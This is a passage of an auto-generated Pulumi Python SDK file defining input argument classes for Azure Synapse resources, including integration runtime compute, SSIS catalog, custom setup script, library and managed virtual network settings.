def variable_name(self, value: pulumi.Input[str]):
pulumi.set(self, "variable_name", value)
@property
@pulumi.getter(name="variableValue")
def variable_value(self) -> pulumi.Input[str]:
"""
The value of the environment variable.
"""
return pulumi.get(self, "variable_value")
@variable_value.setter
def variable_value(self, value: pulumi.Input[str]):
pulumi.set(self, "variable_value", value)
@pulumi.input_type
class GitHubClientSecretArgs:
def __init__(__self__, *,
byoa_secret_akv_url: Optional[pulumi.Input[str]] = None,
byoa_secret_name: Optional[pulumi.Input[str]] = None):
"""
Client secret information for factory's bring your own app repository configuration
:param pulumi.Input[str] byoa_secret_akv_url: Bring your own app client secret AKV URL
:param pulumi.Input[str] byoa_secret_name: Bring your own app client secret name in AKV
"""
if byoa_secret_akv_url is not None:
pulumi.set(__self__, "byoa_secret_akv_url", byoa_secret_akv_url)
if byoa_secret_name is not None:
pulumi.set(__self__, "byoa_secret_name", byoa_secret_name)
@property
@pulumi.getter(name="byoaSecretAkvUrl")
def byoa_secret_akv_url(self) -> Optional[pulumi.Input[str]]:
"""
Bring your own app client secret AKV URL
"""
return pulumi.get(self, "byoa_secret_akv_url")
@byoa_secret_akv_url.setter
def byoa_secret_akv_url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "byoa_secret_akv_url", value)
@property
@pulumi.getter(name="byoaSecretName")
def byoa_secret_name(self) -> Optional[pulumi.Input[str]]:
"""
Bring your own app client secret name in AKV
"""
return pulumi.get(self, "byoa_secret_name")
@byoa_secret_name.setter
def byoa_secret_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "byoa_secret_name", value)
@pulumi.input_type
class IntegrationRuntimeComputePropertiesArgs:
def __init__(__self__, *,
data_flow_properties: Optional[pulumi.Input['IntegrationRuntimeDataFlowPropertiesArgs']] = None,
location: Optional[pulumi.Input[str]] = None,
max_parallel_executions_per_node: Optional[pulumi.Input[int]] = None,
node_size: Optional[pulumi.Input[str]] = None,
number_of_nodes: Optional[pulumi.Input[int]] = None,
v_net_properties: Optional[pulumi.Input['IntegrationRuntimeVNetPropertiesArgs']] = None):
"""
The compute resource properties for managed integration runtime.
:param pulumi.Input['IntegrationRuntimeDataFlowPropertiesArgs'] data_flow_properties: Data flow properties for managed integration runtime.
:param pulumi.Input[str] location: The location for managed integration runtime. The supported regions could be found on https://docs.microsoft.com/en-us/azure/data-factory/data-factory-data-movement-activities
:param pulumi.Input[int] max_parallel_executions_per_node: Maximum parallel executions count per node for managed integration runtime.
:param pulumi.Input[str] node_size: The node size requirement to managed integration runtime.
:param pulumi.Input[int] number_of_nodes: The required number of nodes for managed integration runtime.
:param pulumi.Input['IntegrationRuntimeVNetPropertiesArgs'] v_net_properties: VNet properties for managed integration runtime.
"""
if data_flow_properties is not None:
pulumi.set(__self__, "data_flow_properties", data_flow_properties)
if location is not None:
pulumi.set(__self__, "location", location)
if max_parallel_executions_per_node is not None:
pulumi.set(__self__, "max_parallel_executions_per_node", max_parallel_executions_per_node)
if node_size is not None:
pulumi.set(__self__, "node_size", node_size)
if number_of_nodes is not None:
pulumi.set(__self__, "number_of_nodes", number_of_nodes)
if v_net_properties is not None:
pulumi.set(__self__, "v_net_properties", v_net_properties)
@property
@pulumi.getter(name="dataFlowProperties")
def data_flow_properties(self) -> Optional[pulumi.Input['IntegrationRuntimeDataFlowPropertiesArgs']]:
"""
Data flow properties for managed integration runtime.
"""
return pulumi.get(self, "data_flow_properties")
@data_flow_properties.setter
def data_flow_properties(self, value: Optional[pulumi.Input['IntegrationRuntimeDataFlowPropertiesArgs']]):
pulumi.set(self, "data_flow_properties", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
The location for managed integration runtime. The supported regions could be found on https://docs.microsoft.com/en-us/azure/data-factory/data-factory-data-movement-activities
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter(name="maxParallelExecutionsPerNode")
def max_parallel_executions_per_node(self) -> Optional[pulumi.Input[int]]:
"""
Maximum parallel executions count per node for managed integration runtime.
"""
return pulumi.get(self, "max_parallel_executions_per_node")
@max_parallel_executions_per_node.setter
def max_parallel_executions_per_node(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_parallel_executions_per_node", value)
@property
@pulumi.getter(name="nodeSize")
def node_size(self) -> Optional[pulumi.Input[str]]:
"""
The node size requirement to managed integration runtime.
"""
return pulumi.get(self, "node_size")
@node_size.setter
def node_size(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "node_size", value)
@property
@pulumi.getter(name="numberOfNodes")
def number_of_nodes(self) -> Optional[pulumi.Input[int]]:
"""
The required number of nodes for managed integration runtime.
"""
return pulumi.get(self, "number_of_nodes")
@number_of_nodes.setter
def number_of_nodes(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "number_of_nodes", value)
@property
@pulumi.getter(name="vNetProperties")
def v_net_properties(self) -> Optional[pulumi.Input['IntegrationRuntimeVNetPropertiesArgs']]:
"""
VNet properties for managed integration runtime.
"""
return pulumi.get(self, "v_net_properties")
@v_net_properties.setter
def v_net_properties(self, value: Optional[pulumi.Input['IntegrationRuntimeVNetPropertiesArgs']]):
pulumi.set(self, "v_net_properties", value)
@pulumi.input_type
class IntegrationRuntimeCustomSetupScriptPropertiesArgs:
def __init__(__self__, *,
blob_container_uri: Optional[pulumi.Input[str]] = None,
sas_token: Optional[pulumi.Input['SecureStringArgs']] = None):
"""
Custom setup script properties for a managed dedicated integration runtime.
:param pulumi.Input[str] blob_container_uri: The URI of the Azure blob container that contains the custom setup script.
:param pulumi.Input['SecureStringArgs'] sas_token: The SAS token of the Azure blob container.
"""
if blob_container_uri is not None:
pulumi.set(__self__, "blob_container_uri", blob_container_uri)
if sas_token is not None:
pulumi.set(__self__, "sas_token", sas_token)
@property
@pulumi.getter(name="blobContainerUri")
def blob_container_uri(self) -> Optional[pulumi.Input[str]]:
"""
The URI of the Azure blob container that contains the custom setup script.
"""
return pulumi.get(self, "blob_container_uri")
@blob_container_uri.setter
def blob_container_uri(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "blob_container_uri", value)
@property
@pulumi.getter(name="sasToken")
def sas_token(self) -> Optional[pulumi.Input['SecureStringArgs']]:
"""
The SAS token of the Azure blob container.
"""
return pulumi.get(self, "sas_token")
@sas_token.setter
def sas_token(self, value: Optional[pulumi.Input['SecureStringArgs']]):
pulumi.set(self, "sas_token", value)
@pulumi.input_type
class IntegrationRuntimeDataFlowPropertiesArgs:
def __init__(__self__, *,
cleanup: Optional[pulumi.Input[bool]] = None,
compute_type: Optional[pulumi.Input[Union[str, 'DataFlowComputeType']]] = None,
core_count: Optional[pulumi.Input[int]] = None,
time_to_live: Optional[pulumi.Input[int]] = None):
"""
Data flow properties for managed integration runtime.
:param pulumi.Input[bool] cleanup: Cluster will not be recycled and it will be used in next data flow activity run until TTL (time to live) is reached if this is set as false. Default is true.
:param pulumi.Input[Union[str, 'DataFlowComputeType']] compute_type: Compute type of the cluster which will execute data flow job.
:param pulumi.Input[int] core_count: Core count of the cluster which will execute data flow job. Supported values are: 8, 16, 32, 48, 80, 144 and 272.
:param pulumi.Input[int] time_to_live: Time to live (in minutes) setting of the cluster which will execute data flow job.
"""
if cleanup is not None:
pulumi.set(__self__, "cleanup", cleanup)
if compute_type is not None:
pulumi.set(__self__, "compute_type", compute_type)
if core_count is not None:
pulumi.set(__self__, "core_count", core_count)
if time_to_live is not None:
pulumi.set(__self__, "time_to_live", time_to_live)
@property
@pulumi.getter
def cleanup(self) -> Optional[pulumi.Input[bool]]:
"""
Cluster will not be recycled and it will be used in next data flow activity run until TTL (time to live) is reached if this is set as false. Default is true.
"""
return pulumi.get(self, "cleanup")
@cleanup.setter
def cleanup(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "cleanup", value)
@property
@pulumi.getter(name="computeType")
def compute_type(self) -> Optional[pulumi.Input[Union[str, 'DataFlowComputeType']]]:
"""
Compute type of the cluster which will execute data flow job.
"""
return pulumi.get(self, "compute_type")
@compute_type.setter
def compute_type(self, value: Optional[pulumi.Input[Union[str, 'DataFlowComputeType']]]):
pulumi.set(self, "compute_type", value)
@property
@pulumi.getter(name="coreCount")
def core_count(self) -> Optional[pulumi.Input[int]]:
"""
Core count of the cluster which will execute data flow job. Supported values are: 8, 16, 32, 48, 80, 144 and 272.
"""
return pulumi.get(self, "core_count")
@core_count.setter
def core_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "core_count", value)
@property
@pulumi.getter(name="timeToLive")
def time_to_live(self) -> Optional[pulumi.Input[int]]:
"""
Time to live (in minutes) setting of the cluster which will execute data flow job.
"""
return pulumi.get(self, "time_to_live")
@time_to_live.setter
def time_to_live(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "time_to_live", value)
@pulumi.input_type
class IntegrationRuntimeDataProxyPropertiesArgs:
def __init__(__self__, *,
connect_via: Optional[pulumi.Input['EntityReferenceArgs']] = None,
path: Optional[pulumi.Input[str]] = None,
staging_linked_service: Optional[pulumi.Input['EntityReferenceArgs']] = None):
"""
Data proxy properties for a managed dedicated integration runtime.
:param pulumi.Input['EntityReferenceArgs'] connect_via: The self-hosted integration runtime reference.
:param pulumi.Input[str] path: The path to contain the staged data in the Blob storage.
:param pulumi.Input['EntityReferenceArgs'] staging_linked_service: The staging linked service reference.
"""
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if path is not None:
pulumi.set(__self__, "path", path)
if staging_linked_service is not None:
pulumi.set(__self__, "staging_linked_service", staging_linked_service)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['EntityReferenceArgs']]:
"""
The self-hosted integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['EntityReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def path(self) -> Optional[pulumi.Input[str]]:
"""
The path to contain the staged data in the Blob storage.
"""
return pulumi.get(self, "path")
@path.setter
def path(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "path", value)
@property
@pulumi.getter(name="stagingLinkedService")
def staging_linked_service(self) -> Optional[pulumi.Input['EntityReferenceArgs']]:
"""
The staging linked service reference.
"""
return pulumi.get(self, "staging_linked_service")
@staging_linked_service.setter
def staging_linked_service(self, value: Optional[pulumi.Input['EntityReferenceArgs']]):
pulumi.set(self, "staging_linked_service", value)
@pulumi.input_type
class IntegrationRuntimeSsisCatalogInfoArgs:
def __init__(__self__, *,
catalog_admin_password: Optional[pulumi.Input['SecureStringArgs']] = None,
catalog_admin_user_name: Optional[pulumi.Input[str]] = None,
catalog_pricing_tier: Optional[pulumi.Input[Union[str, 'IntegrationRuntimeSsisCatalogPricingTier']]] = None,
catalog_server_endpoint: Optional[pulumi.Input[str]] = None):
"""
Catalog information for managed dedicated integration runtime.
:param pulumi.Input['SecureStringArgs'] catalog_admin_password: The password of the administrator user account of the catalog database.
:param pulumi.Input[str] catalog_admin_user_name: The administrator user name of catalog database.
:param pulumi.Input[Union[str, 'IntegrationRuntimeSsisCatalogPricingTier']] catalog_pricing_tier: The pricing tier for the catalog database. The valid values could be found in https://azure.microsoft.com/en-us/pricing/details/sql-database/
:param pulumi.Input[str] catalog_server_endpoint: The catalog database server URL.
"""
if catalog_admin_password is not None:
pulumi.set(__self__, "catalog_admin_password", catalog_admin_password)
if catalog_admin_user_name is not None:
pulumi.set(__self__, "catalog_admin_user_name", catalog_admin_user_name)
if catalog_pricing_tier is not None:
pulumi.set(__self__, "catalog_pricing_tier", catalog_pricing_tier)
if catalog_server_endpoint is not None:
pulumi.set(__self__, "catalog_server_endpoint", catalog_server_endpoint)
@property
@pulumi.getter(name="catalogAdminPassword")
def catalog_admin_password(self) -> Optional[pulumi.Input['SecureStringArgs']]:
"""
The password of the administrator user account of the catalog database.
"""
return pulumi.get(self, "catalog_admin_password")
@catalog_admin_password.setter
def catalog_admin_password(self, value: Optional[pulumi.Input['SecureStringArgs']]):
pulumi.set(self, "catalog_admin_password", value)
@property
@pulumi.getter(name="catalogAdminUserName")
def catalog_admin_user_name(self) -> Optional[pulumi.Input[str]]:
"""
The administrator user name of catalog database.
"""
return pulumi.get(self, "catalog_admin_user_name")
@catalog_admin_user_name.setter
def catalog_admin_user_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "catalog_admin_user_name", value)
@property
@pulumi.getter(name="catalogPricingTier")
def catalog_pricing_tier(self) -> Optional[pulumi.Input[Union[str, 'IntegrationRuntimeSsisCatalogPricingTier']]]:
"""
The pricing tier for the catalog database. The valid values could be found in https://azure.microsoft.com/en-us/pricing/details/sql-database/
"""
return pulumi.get(self, "catalog_pricing_tier")
@catalog_pricing_tier.setter
def catalog_pricing_tier(self, value: Optional[pulumi.Input[Union[str, 'IntegrationRuntimeSsisCatalogPricingTier']]]):
pulumi.set(self, "catalog_pricing_tier", value)
@property
@pulumi.getter(name="catalogServerEndpoint")
def catalog_server_endpoint(self) -> Optional[pulumi.Input[str]]:
"""
The catalog database server URL.
"""
return pulumi.get(self, "catalog_server_endpoint")
@catalog_server_endpoint.setter
def catalog_server_endpoint(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "catalog_server_endpoint", value)
@pulumi.input_type
class IntegrationRuntimeSsisPropertiesArgs:
def __init__(__self__, *,
catalog_info: Optional[pulumi.Input['IntegrationRuntimeSsisCatalogInfoArgs']] = None,
custom_setup_script_properties: Optional[pulumi.Input['IntegrationRuntimeCustomSetupScriptPropertiesArgs']] = None,
data_proxy_properties: Optional[pulumi.Input['IntegrationRuntimeDataProxyPropertiesArgs']] = None,
edition: Optional[pulumi.Input[Union[str, 'IntegrationRuntimeEdition']]] = None,
express_custom_setup_properties: Optional[pulumi.Input[Sequence[pulumi.Input[Union['CmdkeySetupArgs', 'ComponentSetupArgs', 'EnvironmentVariableSetupArgs']]]]] = None,
license_type: Optional[pulumi.Input[Union[str, 'IntegrationRuntimeLicenseType']]] = None):
"""
SSIS properties for managed integration runtime.
:param pulumi.Input['IntegrationRuntimeSsisCatalogInfoArgs'] catalog_info: Catalog information for managed dedicated integration runtime.
:param pulumi.Input['IntegrationRuntimeCustomSetupScriptPropertiesArgs'] custom_setup_script_properties: Custom setup script properties for a managed dedicated integration runtime.
:param pulumi.Input['IntegrationRuntimeDataProxyPropertiesArgs'] data_proxy_properties: Data proxy properties for a managed dedicated integration runtime.
:param pulumi.Input[Union[str, 'IntegrationRuntimeEdition']] edition: The edition for the SSIS Integration Runtime
:param pulumi.Input[Sequence[pulumi.Input[Union['CmdkeySetupArgs', 'ComponentSetupArgs', 'EnvironmentVariableSetupArgs']]]] express_custom_setup_properties: Custom setup without script properties for a SSIS integration runtime.
:param pulumi.Input[Union[str, 'IntegrationRuntimeLicenseType']] license_type: License type for bringing your own license scenario.
"""
if catalog_info is not None:
pulumi.set(__self__, "catalog_info", catalog_info)
if custom_setup_script_properties is not None:
pulumi.set(__self__, "custom_setup_script_properties", custom_setup_script_properties)
if data_proxy_properties is not None:
pulumi.set(__self__, "data_proxy_properties", data_proxy_properties)
if edition is not None:
pulumi.set(__self__, "edition", edition)
if express_custom_setup_properties is not None:
pulumi.set(__self__, "express_custom_setup_properties", express_custom_setup_properties)
if license_type is not None:
pulumi.set(__self__, "license_type", license_type)
@property
@pulumi.getter(name="catalogInfo")
def catalog_info(self) -> Optional[pulumi.Input['IntegrationRuntimeSsisCatalogInfoArgs']]:
"""
Catalog information for managed dedicated integration runtime.
"""
return pulumi.get(self, "catalog_info")
@catalog_info.setter
def catalog_info(self, value: Optional[pulumi.Input['IntegrationRuntimeSsisCatalogInfoArgs']]):
pulumi.set(self, "catalog_info", value)
@property
@pulumi.getter(name="customSetupScriptProperties")
def custom_setup_script_properties(self) -> Optional[pulumi.Input['IntegrationRuntimeCustomSetupScriptPropertiesArgs']]:
"""
Custom setup script properties for a managed dedicated integration runtime.
"""
return pulumi.get(self, "custom_setup_script_properties")
@custom_setup_script_properties.setter
def custom_setup_script_properties(self, value: Optional[pulumi.Input['IntegrationRuntimeCustomSetupScriptPropertiesArgs']]):
pulumi.set(self, "custom_setup_script_properties", value)
@property
@pulumi.getter(name="dataProxyProperties")
def data_proxy_properties(self) -> Optional[pulumi.Input['IntegrationRuntimeDataProxyPropertiesArgs']]:
"""
Data proxy properties for a managed dedicated integration runtime.
"""
return pulumi.get(self, "data_proxy_properties")
@data_proxy_properties.setter
def data_proxy_properties(self, value: Optional[pulumi.Input['IntegrationRuntimeDataProxyPropertiesArgs']]):
pulumi.set(self, "data_proxy_properties", value)
@property
@pulumi.getter
def edition(self) -> Optional[pulumi.Input[Union[str, 'IntegrationRuntimeEdition']]]:
"""
The edition for the SSIS Integration Runtime
"""
return pulumi.get(self, "edition")
@edition.setter
def edition(self, value: Optional[pulumi.Input[Union[str, 'IntegrationRuntimeEdition']]]):
pulumi.set(self, "edition", value)
@property
@pulumi.getter(name="expressCustomSetupProperties")
def express_custom_setup_properties(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[Union['CmdkeySetupArgs', 'ComponentSetupArgs', 'EnvironmentVariableSetupArgs']]]]]:
"""
Custom setup without script properties for a SSIS integration runtime.
"""
return pulumi.get(self, "express_custom_setup_properties")
@express_custom_setup_properties.setter
def express_custom_setup_properties(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[Union['CmdkeySetupArgs', 'ComponentSetupArgs', 'EnvironmentVariableSetupArgs']]]]]):
pulumi.set(self, "express_custom_setup_properties", value)
@property
@pulumi.getter(name="licenseType")
def license_type(self) -> Optional[pulumi.Input[Union[str, 'IntegrationRuntimeLicenseType']]]:
"""
License type for bringing your own license scenario.
"""
return pulumi.get(self, "license_type")
@license_type.setter
def license_type(self, value: Optional[pulumi.Input[Union[str, 'IntegrationRuntimeLicenseType']]]):
pulumi.set(self, "license_type", value)
@pulumi.input_type
class IntegrationRuntimeVNetPropertiesArgs:
def __init__(__self__, *,
public_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
subnet: Optional[pulumi.Input[str]] = None,
v_net_id: Optional[pulumi.Input[str]] = None):
"""
VNet properties for managed integration runtime.
:param pulumi.Input[Sequence[pulumi.Input[str]]] public_ips: Resource IDs of the public IP addresses that this integration runtime will use.
:param pulumi.Input[str] subnet: The name of the subnet this integration runtime will join.
:param pulumi.Input[str] v_net_id: The ID of the VNet that this integration runtime will join.
"""
if public_ips is not None:
pulumi.set(__self__, "public_ips", public_ips)
if subnet is not None:
pulumi.set(__self__, "subnet", subnet)
if v_net_id is not None:
pulumi.set(__self__, "v_net_id", v_net_id)
@property
@pulumi.getter(name="publicIPs")
def public_ips(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Resource IDs of the public IP addresses that this integration runtime will use.
"""
return pulumi.get(self, "public_ips")
@public_ips.setter
def public_ips(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "public_ips", value)
@property
@pulumi.getter
def subnet(self) -> Optional[pulumi.Input[str]]:
"""
The name of the subnet this integration runtime will join.
"""
return pulumi.get(self, "subnet")
@subnet.setter
def subnet(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnet", value)
@property
@pulumi.getter(name="vNetId")
def v_net_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the VNet that this integration runtime will join.
"""
return pulumi.get(self, "v_net_id")
@v_net_id.setter
def v_net_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "v_net_id", value)
@pulumi.input_type
class LibraryInfoArgs:
def __init__(__self__, *,
container_name: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
path: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None,
uploaded_timestamp: Optional[pulumi.Input[str]] = None):
"""
Library/package information of a Big Data pool powered by Apache Spark
:param pulumi.Input[str] container_name: Storage blob container name.
:param pulumi.Input[str] name: Name of the library.
:param pulumi.Input[str] path: Storage blob path of library.
:param pulumi.Input[str] type: Type of the library.
:param pulumi.Input[str] uploaded_timestamp: The last update time of the library.
"""
if container_name is not None:
pulumi.set(__self__, "container_name", container_name)
if name is not None:
pulumi.set(__self__, "name", name)
if path is not None:
pulumi.set(__self__, "path", path)
if type is not None:
pulumi.set(__self__, "type", type)
if uploaded_timestamp is not None:
pulumi.set(__self__, "uploaded_timestamp", uploaded_timestamp)
@property
@pulumi.getter(name="containerName")
def container_name(self) -> Optional[pulumi.Input[str]]:
"""
Storage blob container name.
"""
return pulumi.get(self, "container_name")
@container_name.setter
def container_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "container_name", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the library.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def path(self) -> Optional[pulumi.Input[str]]:
"""
Storage blob path of library.
"""
return pulumi.get(self, "path")
@path.setter
def path(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "path", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
"""
Type of the library.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="uploadedTimestamp")
def uploaded_timestamp(self) -> Optional[pulumi.Input[str]]:
"""
The last update time of the library.
"""
return pulumi.get(self, "uploaded_timestamp")
@uploaded_timestamp.setter
def uploaded_timestamp(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "uploaded_timestamp", value)
@pulumi.input_type
class LibraryRequirementsArgs:
def __init__(__self__, *,
content: Optional[pulumi.Input[str]] = None,
filename: Optional[pulumi.Input[str]] = None):
"""
Library requirements for a Big Data pool powered by Apache Spark
:param pulumi.Input[str] content: The library requirements.
:param pulumi.Input[str] filename: The filename of the library requirements file.
"""
if content is not None:
pulumi.set(__self__, "content", content)
if filename is not None:
pulumi.set(__self__, "filename", filename)
@property
@pulumi.getter
def content(self) -> Optional[pulumi.Input[str]]:
"""
The library requirements.
"""
return pulumi.get(self, "content")
@content.setter
def content(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "content", value)
@property
@pulumi.getter
def filename(self) -> Optional[pulumi.Input[str]]:
"""
The filename of the library requirements file.
"""
return pulumi.get(self, "filename")
@filename.setter
def filename(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "filename", value)
@pulumi.input_type
class LinkedIntegrationRuntimeKeyAuthorizationArgs:
def __init__(__self__, *,
authorization_type: pulumi.Input[str],
key: pulumi.Input['SecureStringArgs']):
"""
The key authorization type integration runtime.
:param pulumi.Input[str] authorization_type: The authorization type for integration runtime sharing.
Expected value is 'Key'.
:param pulumi.Input['SecureStringArgs'] key: The key used for authorization.
"""
pulumi.set(__self__, "authorization_type", 'Key')
pulumi.set(__self__, "key", key)
@property
@pulumi.getter(name="authorizationType")
def authorization_type(self) -> pulumi.Input[str]:
"""
The authorization type for integration runtime sharing.
Expected value is 'Key'.
"""
return pulumi.get(self, "authorization_type")
@authorization_type.setter
def authorization_type(self, value: pulumi.Input[str]):
pulumi.set(self, "authorization_type", value)
@property
@pulumi.getter
def key(self) -> pulumi.Input['SecureStringArgs']:
"""
The key used for authorization.
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: pulumi.Input['SecureStringArgs']):
pulumi.set(self, "key", value)
@pulumi.input_type
class LinkedIntegrationRuntimeRbacAuthorizationArgs:
def __init__(__self__, *,
authorization_type: pulumi.Input[str],
resource_id: pulumi.Input[str]):
"""
The role based access control (RBAC) authorization type integration runtime.
:param pulumi.Input[str] authorization_type: The authorization type for integration runtime sharing.
Expected value is 'RBAC'.
:param pulumi.Input[str] resource_id: The resource identifier of the integration runtime to be shared.
"""
pulumi.set(__self__, "authorization_type", 'RBAC')
pulumi.set(__self__, "resource_id", resource_id)
@property
@pulumi.getter(name="authorizationType")
def authorization_type(self) -> pulumi.Input[str]:
"""
The authorization type for integration runtime sharing.
Expected value is 'RBAC'.
"""
return pulumi.get(self, "authorization_type")
@authorization_type.setter
def authorization_type(self, value: pulumi.Input[str]):
pulumi.set(self, "authorization_type", value)
@property
@pulumi.getter(name="resourceId")
def resource_id(self) -> pulumi.Input[str]:
"""
The resource identifier of the integration runtime to be shared.
"""
return pulumi.get(self, "resource_id")
@resource_id.setter
def resource_id(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_id", value)
@pulumi.input_type
class ManagedIdentityArgs:
def __init__(__self__, *,
type: Optional[pulumi.Input['ResourceIdentityType']] = None):
"""
The workspace managed identity
:param pulumi.Input['ResourceIdentityType'] type: The type of managed identity for the workspace
"""
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input['ResourceIdentityType']]:
"""
The type of managed identity for the workspace
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input['ResourceIdentityType']]):
pulumi.set(self, "type", value)
@pulumi.input_type
class ManagedIntegrationRuntimeArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
compute_properties: Optional[pulumi.Input['IntegrationRuntimeComputePropertiesArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
managed_virtual_network: Optional[pulumi.Input['ManagedVirtualNetworkReferenceArgs']] = None,
ssis_properties: Optional[pulumi.Input['IntegrationRuntimeSsisPropertiesArgs']] = None):
"""
Managed integration runtime, including managed elastic and managed dedicated integration runtimes.
:param pulumi.Input[str] type: The type of integration runtime.
Expected value is 'Managed'.
:param pulumi.Input['IntegrationRuntimeComputePropertiesArgs'] compute_properties: The compute resource for managed integration runtime.
:param pulumi.Input[str] description: Integration runtime description.
:param pulumi.Input['ManagedVirtualNetworkReferenceArgs'] managed_virtual_network: Managed Virtual Network reference.
:param pulumi.Input['IntegrationRuntimeSsisPropertiesArgs'] ssis_properties: SSIS properties for managed integration runtime.
"""
pulumi.set(__self__, "type", 'Managed')
if compute_properties is not None:
pulumi.set(__self__, "compute_properties", compute_properties)
if description is not None:
pulumi.set(__self__, "description", description)
if managed_virtual_network is not None:
pulumi.set(__self__, "managed_virtual_network", managed_virtual_network)
if ssis_properties is not None:
pulumi.set(__self__, "ssis_properties", ssis_properties)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
The type of integration runtime.
Expected value is 'Managed'.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="computeProperties")
def compute_properties(self) -> Optional[pulumi.Input['IntegrationRuntimeComputePropertiesArgs']]:
"""
The compute resource for managed integration runtime.
"""
return pulumi.get(self, "compute_properties")
@compute_properties.setter
def compute_properties(self, value: Optional[pulumi.Input['IntegrationRuntimeComputePropertiesArgs']]):
pulumi.set(self, "compute_properties", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Integration runtime description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="managedVirtualNetwork")
def managed_virtual_network(self) -> Optional[pulumi.Input['ManagedVirtualNetworkReferenceArgs']]:
"""
Managed Virtual Network reference.
"""
return pulumi.get(self, "managed_virtual_network")
@managed_virtual_network.setter
def managed_virtual_network(self, value: Optional[pulumi.Input['ManagedVirtualNetworkReferenceArgs']]):
pulumi.set(self, "managed_virtual_network", value)
@property
@pulumi.getter(name="ssisProperties")
def ssis_properties(self) -> Optional[pulumi.Input['IntegrationRuntimeSsisPropertiesArgs']]:
"""
SSIS properties for managed integration runtime.
"""
return pulumi.get(self, "ssis_properties")
@ssis_properties.setter
def ssis_properties(self, value: Optional[pulumi.Input['IntegrationRuntimeSsisPropertiesArgs']]):
pulumi.set(self, "ssis_properties", value)
@pulumi.input_type
class ManagedVirtualNetworkReferenceArgs:
def __init__(__self__, *,
reference_name: pulumi.Input[str],
type: pulumi.Input[str]):
"""
Managed Virtual Network reference type.
:param pulumi.Input[str] reference_name: Reference ManagedVirtualNetwork name.
:param pulumi.Input[str] type: Managed Virtual Network reference type.
"""
pulumi.set(__self__, "reference_name", reference_name)
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="referenceName")
def reference_name(self) -> pulumi.Input[str]:
"""
Reference ManagedVirtualNetwork name.
"""
return pulumi.get(self, "reference_name")
@reference_name.setter
def reference_name(self, value: pulumi.Input[str]):
pulumi.set(self, "reference_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Managed Virtual Network reference type.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@pulumi.input_type
class ManagedVirtualNetworkSettingsArgs:
def __init__(__self__, *,
allowed_aad_tenant_ids_for_linking: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
linked_access_check_on_target_resource: Optional[pulumi.Input[bool]] = None,
prevent_data_exfiltration: Optional[pulumi.Input[bool]] = None):
"""
Managed Virtual Network Settings
:param pulumi.Input[Sequence[pulumi.Input[str]]] allowed_aad_tenant_ids_for_linking: Allowed Aad Tenant Ids For Linking
:param pulumi.Input[bool] linked_access_check_on_target_resource: Linked Access Check On Target Resource
:param pulumi.Input[bool] prevent_data_exfiltration: Prevent Data Exfiltration
"""
if allowed_aad_tenant_ids_for_linking is not None:
pulumi.set(__self__, "allowed_aad_tenant_ids_for_linking", allowed_aad_tenant_ids_for_linking)
if linked_access_check_on_target_resource is not None:
